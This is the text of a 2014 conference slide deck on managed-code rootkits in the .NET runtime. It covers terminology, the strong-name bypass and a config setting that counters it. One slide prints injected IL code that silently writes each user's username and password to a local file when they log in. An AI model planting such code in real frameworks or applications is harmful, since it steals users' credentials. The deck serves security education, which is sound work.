This is a quick experiment in messing with the .NET framework for the purpose of showing potential attacks if someone gets root on a machine. Presented at CodeMash, January 8, 2014

1. How Well Do You Know
Your Runtime?
Rob Gillen
@argodev
This work is licensed under a Creative Commons Attribution 3.0 License.

2. Don’t Be Stupid
The following presentation describes real
attacks on real systems. Please note that
most of the attacks described would be
considered ILLEGAL if attempted on
machines that you do not have explicit
permission to test and attack. I assume no
responsibility for any actions you perform
based on the content of this presentation
or subsequent conversations.
Please remember this basic guideline: With
knowledge comes responsibility.

3. Disclaimer
The content of this presentation
represents my personal views and
thoughts at the present time. This
content is not endorsed by, or
representative in any way of my
employer nor is it intended to be a
view into my work or a reflection on
the type of work that I or my group
performs. It is simply a hobby and
personal interest and should be
considered as such.

4. Credits
Many ideas for this talk are derived from
“Managed Code Rootkits: Hooking Into
Runtime Environments”, Erez Metula,
Syngress, 2011
Some ideas are from “Gray Hat Python”,
Justin Seitz, No Starch, 2009
Other Ideas are from colleagues far
Few ideas are my own

5. root·kit
/ˈ otˈkit
ro͞
/
noun: rootkit; plural noun: rootkits
a set of software tools that enable an
unauthorized user to gain control of a
computer system without being detected.
http://google.com/search?q=define+rootkit

6. A rootkit is a stealthy type of software,
typically malicious, designed to hide the
existence of certain processes or programs
from normal methods of detection and enable
continued privileged access to a computer.
The term rootkit is a concatenation of
"root" (the traditional name of the
privileged account on Unix operating
systems) and the word "kit" (which refers
to the software components that implement
the tool). The term "rootkit" has negative
connotations through its association with
malware.
http://en.wikipedia.org/wiki/Rootkit

7. Terminology
• Runtime Environment/Application-Level
Virtual Machine
• Java JVM
• .NET Framework aka Common Language
Runtime (CLR)
• Android Dalvik
• Intermediate Language
• MS IL
• Managed Code
• Java
• C#, VB.NET, F#, etc.

8. http://www.everbot.com/c-programming-language/

9. http://http://java.sampleexamples.com/java-is-best-suited-for-internet/

10. DEMO: Modifying
Default Behavior

11. .method public hidebysig static bool Login(string userName, string password, [opt] bool
persistCookie) cil managed
{
.param [3] = bool(false)
// Code size
.maxstack
26 (0x1a)
2
.locals init (bool V_0)
IL_0000:
call
IL_0005:
pop
IL_0006:
ldarg.0
IL_0007:
class WebMatrix.WebData.ExtendedMembershipProvider
WebMatrix.WebData.WebSecurity::VerifyProvider()
ldarg.1
IL_0008: call
bool
[System.Web]System.Web.Security.Membership::ValidateUser(string, string)
IL_000d:
stloc.0
IL_000e:
ldloc.0
IL_000f:
brfalse.s
IL_0011:
ldarg.0
IL_0012:
ldarg.2
IL_0018
IL_0013: call
void
[System.Web]System.Web.Security.FormsAuthentication::SetAuthCookie(string,
bool)
IL_0018:
ldloc.0
IL_0019:
ret
} // end of method WebSecurity::Login

12. // OK, let's be a little evil
IL_00XX: nop
IL_00XX: ldstr "C:UsersPublicmylog.txt"
IL_00XX: ldarg.0 // get the username
IL_00XX: ldstr ","
IL_00XX: ldarg.1 // get the password
IL_00XX: ldstr "rn"
// set the data (concatenate the pervious strings)
IL_00XX: call string System.String::Concat(string,string,string,string)
// write the data
IL_00XX: call void [mscorlib]System.IO.File::AppendAllText(string, string)
IL_00XX: nop

13. Protection
• Local Runtime?
• Signature Checking?

14. Progress?
Starting with the .NET Framework 3.5 Service
Pack 1, strong-name signatures are not
validated when an assembly is loaded into a
full-trust application domain, such as the
default application domain for the MyComputer
zone. This is referred to as the strong-name
bypass feature. In a full-trust environment,
demands for StrongNameIdentityPermission
always succeed for signed, full-trust
assemblies, regardless of their signature.
The strong-name bypass feature avoids the
unnecessary overhead of strong-name signature
verification of full-trust assemblies in this
situation, allowing the assemblies to load
faster.
http://msdn.microsoft.com/en-us/library/xwb8f617%28v=vs.110%29.aspx

15. Mixed Success
<configuration>
<runtime>
<bypassTrustedAppStrongNames
enabled="false" />
</runtime>
</configuration>

16. o_O
.method assembly hidebysig static class System.Reflection.RuntimeAssembly
InternalLoadAssemblyName(
class System.Reflection.AssemblyName assemblyRef,
class System.Security.Policy.Evidence assemblySecurity,
class System.Reflection.RuntimeAssembly reqAssembly,
valuetype System.Threading.StackCrawlMark& stackMark,
native int pPrivHostBinder,
bool throwOnFileNotFound,
bool forIntrospection,
bool suppressSecurityChecks) cil managed
{
method logic…

17. Questions/Contact
Rob Gillen
rob@gillenfamily.net
http://rob.gillenfamily.net
@argodev